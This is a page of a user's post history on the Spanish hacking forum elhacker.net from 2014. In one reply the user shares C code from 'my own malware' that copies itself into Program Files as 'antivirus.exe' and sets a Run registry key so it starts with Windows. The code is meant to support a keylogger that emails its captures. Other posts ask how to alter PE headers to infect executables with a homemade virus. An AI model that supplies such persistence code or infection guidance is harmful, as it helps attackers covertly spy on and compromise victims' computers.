elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 [10] 11
91  Informática / Hardware / Re: la fuente de mi pc exploto ayuda en: 22 Agosto 2014, 01:42 am
Lo siento, pero este no es el sitio mas idoneo para tu pregunta. Podrías dejar tu pregunta en la sección Electronica, aunque no sé si alguien será capaz de responder tu pregunta porque este es un foro de hacking, y no creo que este relacionado con tu tematica. Espero que alguien pueda ayudarte, y trata de publicar tus posts en el sitio en donde van (creo que irían en otro foro).

92  Seguridad Informática / Análisis y Diseño de Malware / Re: Añadir keylogger al registro, y envio por email. en: 21 Agosto 2014, 00:57 am
Debes aprender más sobre programacion en C. Por lo que veo, solo es cuestion de agregar una llamada a la funcion que inicia con Windows en el cuerpo de la funcion main. Hasta aqui te puedo ayudar. Son errores simples, solo debes conocer el lenguaje C, y en eso no te puedo ayudar.
93  Seguridad Informática / Análisis y Diseño de Malware / Re: Añadir keylogger al registro, y envio por email. en: 20 Agosto 2014, 23:51 pm
Yo te puedo dar un fragmento de codigo de mi propio malware que te permita iniciar con Windows. Espero que te sirva, analizalo, y pruebalo para saber si es lo que buscas. Lo he comentado en ingles, para que se vea mas profesional. Deberías aprender ese idioma para poder participar en foros de habla inglesa.

Código
  1. #include "windows.h"
  2.  
  3. ///This function copies the malware executable to the system folder
  4. ///And after that, create a registry key to start with Windows.
  5. int start_with_windows(){
  6.    char execution_dir[MAX_PATH];
  7.    char *program_files_variable;
  8.    char path_destiny[MAX_PATH];
  9.  
  10.    cout << "Start with windows..." << endl;
  11.  
  12.    ///Gets from which directory the program is running
  13.    HMODULE current_executable = GetModuleHandle(NULL);
  14.    GetModuleFileName(current_executable,execution_dir, sizeof(execution_dir));
  15.  
  16.    ///Gets program files directory
  17.    program_files_variable = getenv("PROGRAMFILES");
  18.  
  19.    ///Copies the program files directory to the destiny path string
  20.    strcpy(path_destiny, program_files_variable);
  21.    strcat(path_destiny, "\\antivirus.exe");
  22.  
  23.    ///Copies the file to the program files folder
  24.    CopyFile(execution_dir, path_destiny, false);
  25.  
  26.    ///Creates a registry key
  27.    HKEY hKey;
  28.  
  29.    ///Opens the registry key "run" to start with Windows
  30.    RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
  31.  
  32.    ///Set the value of the new key. Put the path of the malware
  33.    RegSetValueEx(hKey, "Antivirus Hola",0,REG_SZ,(const unsigned char*) path_destiny,sizeof(path_destiny));
  34.  
  35.    RegCloseKey(hKey);
  36.  
  37.    ///Debugging purpouses
  38.    //cout << execution_dir << endl;
  39.  
  40.    return 0;
  41. }
  42.  
  43.  
  44.  

Yo te recomiendo que hagas tu keylogger en C puro, sin usar C++ o Batch. ¿Por que razón? Porque es más eficiente y profesional usar C. Batch no sirve para crear malware de verdad.

Espero que mi codigo te haya sido util. Si alguna cosa, no dudes en venir al foro de nuevo. Aqui estamos para ayudarnos mutuamente.
94  Seguridad Informática / Análisis y Diseño de Malware / Re: ¿Que debo modificar en el PE Header de un exe para infectarlo con virus???? en: 19 Agosto 2014, 17:34 pm
Gracias por sus respuestas
95  Foros Generales / Dudas Generales / Como borrar un post que hice yo?? Me equivoque y lo dupliqué en: 19 Agosto 2014, 01:24 am
Hola, escribo este mensaje para preguntarles, ¿Como puedo eliminar un post que hice yo? Lo que ocurre es que mientras escribía un post, de casualidad se envio dos veces, y quisiera borrar el duplicado antes de que algun moderador piense que yo estoy haciendo spam.

No sé porque se envio doble, solo ocurrio. Si pudieran decirme como borrar el post, estaría muy agradecido. Gracias de antemano por sus respuestas.
96  Seguridad Informática / Análisis y Diseño de Malware / ¿Que debo modificar en el PE Header de un exe para infectarlo con virus???? en: 19 Agosto 2014, 01:22 am
[Disculpen, no sabía que mi post anterior había sido movido aquí, por favor, si pueden respondan a mi pregunta]

Hola, estoy desarrollando un virus sencillo en assembly. Es capaz de buscar archivos .exe en el directorio especificado, pero me falta una parte: ¿Que debo modificar en el PE Header de un exe para infectarlo con mi virus sencillo??? Es lo unico que me falta.

No piensen que estoy haciendo preguntas de lammers, ya que tengo conocimientos sobre algunas cosas sobre las cabeceras de los ejecutables de Windows, pero no sé que debiera modificar exactamente para que mi virus sea añadido al final del ejecutable y corra de primero.

Si pudieran darme una guia sobre que campos de los Headers del Exe debo modificar, estaría muy agradecido. Gracias por sus respuestas de antemano.
97  Seguridad Informática / Análisis y Diseño de Malware / Re: Que debo modificar en el PE Header de un ejecutable para infectarlo???? en: 19 Agosto 2014, 00:45 am
Gracias MCKSys Argentina por responderme. Me imagino que moverán el post.
98  Seguridad Informática / Análisis y Diseño de Malware / Que debo modificar en el PE Header de un ejecutable para infectarlo???? en: 19 Agosto 2014, 00:16 am
Hola, no sé si esto debería ir en este subforo, pero como vi que decía "Windows", me imagino que será cosas relacionadas a la programacion en Windows. Bueno, mi problema es este: Estoy desarrollando un virus simple. Ya mi virus es capaz de buscar archivos .exe, pero no sé como infectarlos, es decir, sobreescribir el PE header para poder añadir mi virus a él.

Eso es todo lo que me falta para terminar mi malware. Por favor, si pudieran darme una guía detallada sobre que hacer, que modificar y que añadirle al PE header para que mi virus se quede anexado al ejecutable sin dañarlo, estaría muy agradecido.

Gracias de antemano por sus respuestas
99  Programación / ASM / Re: Ayuda con metodo para encontrar la direccion del Kernel y llamar APIs en memoria en: 17 Agosto 2014, 01:16 am
Ok, gracias por aclararme que ese no es el kernel, Eternal Idol. Yo solo me refería al kernel32 en donde estan las APIs. El link que me dio daryo es bueno, Gracias a todos por responder
100  Programación / ASM / Re: Ayuda con metodo para encontrar la direccion del Kernel y llamar APIs en memoria en: 16 Agosto 2014, 22:45 pm
Gracias daryo.
Páginas: 1 2 3 4 5 6 7 8 9 [10] 11
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines